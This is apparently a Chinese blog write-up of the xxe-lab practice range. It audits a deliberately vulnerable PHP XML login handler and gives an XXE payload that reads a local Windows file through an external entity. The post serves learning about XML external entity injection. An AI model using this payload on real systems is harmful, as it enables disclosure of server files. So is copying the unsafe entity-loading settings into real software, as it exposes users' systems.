【xml外部实体注入】xxe-lab

最新推荐文章于 2024-05-11 21:47:29 发布
最新推荐文章于 2024-05-11 21:47:29 发布
阅读量426 收藏 2
点赞数
分类专栏: web安全 文章标签: xml xee
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kongzhian/article/details/121016845
版权

1、打开靶场地址/xxe-lab-master/php_xxe/

2、 抓包分析,用户名密码以POST提交,且形式类似xml

3、 审计源码

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input'); //php://input可以访问请求的原始数据的只读流,这里是读取post提交的字符串序列

try{
	$dom = new DOMDocument(); //新建了一个xml对象
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //将post数据转变成xml文档
	$creds = simplexml_import_dom($dom);  //实例化  在此处发生了漏洞的利用
 
	$username = $creds->username;  //取xml中的<username></username> 把漏洞利用得到的信息提取出来 
	$password = $creds->password;  //取xml中的<password></password>

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username); 
 //%d=1 %s=$username 这里1用来判断成功登录
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username); 
 //%d=0 %s=$username 这里0用来判断登录失败
	}	
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
  var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 

  $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        // 成功提交后会返回result
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){ // 由上 0为登录失败
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){  //由上 1为登录成功
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });

注意:漏洞利用是在上述

    $dom = new DOMDocument(); //新建了一个xml对象
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //将post数据转变成xml文档
    $creds = simplexml_import_dom($dom);  //实例化  在此处发生了漏洞的利用

处,后面的只不过是将漏洞得到的信息拿出来

4、利用

构造payload

<?xml version="1.0" ?>
<!DOCTYPE
a [
<!ENTITY b SYSTEM 'file:///c://windows/win.ini'>]
>
<aaa><username>&b;</username></aaa>

 

kzaaa
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxe - lab
uihijio的博客
04-22 280
php-xxe 我们抓一下包看一下吧。 看到了我们发送的用户名/密码都是以POST形式发送的。并且很像是xml文档、 接下来开始源码审计。 <?php /** * autor: c0ny1 * date: 2018-2-7 */ $USERNAME = 'admin'; //账号 $PASSWORD = 'admin'; //密码 $result = null; libxml_dis...
XXE实体注入XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2023
XXE实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XMLXML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
XXE-lab靶场搭建
最新发布
MateSnake的博客
05-11 331
XXE-lab靶场搭建
XXEXXE-Lab
情感博主V
02-24 1581
简介 1. XXE Injection(XML External Entity Injection)XML外部实体注入 服务端接收和解析了来自用户端的XML数据,而又没有做严格的安全控制,从而导致XML外部实体注入。 2. XML(Extensible Markup Language)可扩展标记语言 XML用来传输和存储数据; XML的标签没有预定义,需要自行定义标签; XML文档结构包括:XML...
xxe-lab学习
win176489的博客
03-03 856
xxe-lab学习 xxexml外部实体注入,程序在解析xml文件时,引用了不安全的外部实体 环境如下 首先时回显的xxe,测试数据如下 POST /php_xxe/doLogin.php HTTP/1.1 Host: 10.10.6.168 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: application/xml, text/xml, */*; q=0.01 Acc
边打XXE-lab边学习(一)
negnegil的博客
06-19 4730
一、简介及靶场搭建 简介 XXEXML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 XXE原理 XXEXML外部实体注入 。我们先分别理解一下注入外部实体的含义。 注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。 外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。 所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
DTD学习一(入门)
Joy的专栏
04-04 575
一 简介 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 二、实例 1、如果一个DTD被包含在XML源文件中,如使用如下test.xml: 文档定义语法: 元素定义语法: 2、如果是一个XML文件引用一个外部的DTD文件,如下实例: te
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体XML文档的一部分,允许引用外部资源,如文件系统、网络...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
XML schema 编辑工具 xxe-perso-4_9_1
11-19
XXEXML External Entity)是与XML解析相关的安全漏洞,它允许攻击者通过在XML文档中引用外部实体来获取服务器上的敏感信息或执行恶意操作。 "xxe-perso-4_9_1"看起来是一款专门针对XML Schema编辑的工具,版本号...
XXE - 防御策略-01
09-15
为了防御 XXE 漏洞,需要采取多种防御策略,包括禁用外部实体、过滤用户提交的 XML 数据 orazing Input Validation。同时,还需要保持软件和库的最新版本,避免使用旧版本的 libxml2 库。 XXE 漏洞是一种潜在的安全...
xxe-lab-master/php_xxe;简单练习;靶场;XXEXML
xiaochenhang的博客
08-24 625
看到这个:Accept: application/xml, text/xml。3、随便输入一个账户名和密码进行抓包 (burpsuite);xxe-lab-master.zip - 蓝奏云。这里是看一下Windows下的配置文件;也可以考虑使用其他伪协议,链接其他东西;5、看到回显,告一段落;2、搭建好环境后是这样;文件大小:1.7 M|4、进行XEE注入
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 2953
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
xxe-lab来深入学习xxe漏洞
aaeoj8957的博客
06-07 733
这几天,想复习一下xxe的知识,于是把以前的一个靶场拿过来玩玩,顺便审计一下代码2333,靶场地址:https://github.com/c0ny1/xxe-lab 首先先练习的是php-xxe: ...
XXE漏洞及Blind XXE练习
Shinpachi8的博客
12-04 4305
XXE漏洞及Blind XXE实例。 详细说明。
XXE漏洞原理、xxe-lab演示和防御
m0_61506558的博客
08-24 711
eXtensibleMarkupLanguage可扩展标记语言常用于从客户端向服务器提交数据。然后, 服务器端应用程序将处理这些数据,并且可能会返回一个包含XML或任何其他格式数据的响应。和HTML有一定的相像之处(部分语法不同),它还可以做配置文件、交换数据和图像格式等等。
[NCTF2019]Fake XML cookbook
05-10 214
function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || password == ""){ alert("Please enter the username and password!"); return; } var data = "<user><username>" + userna...
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值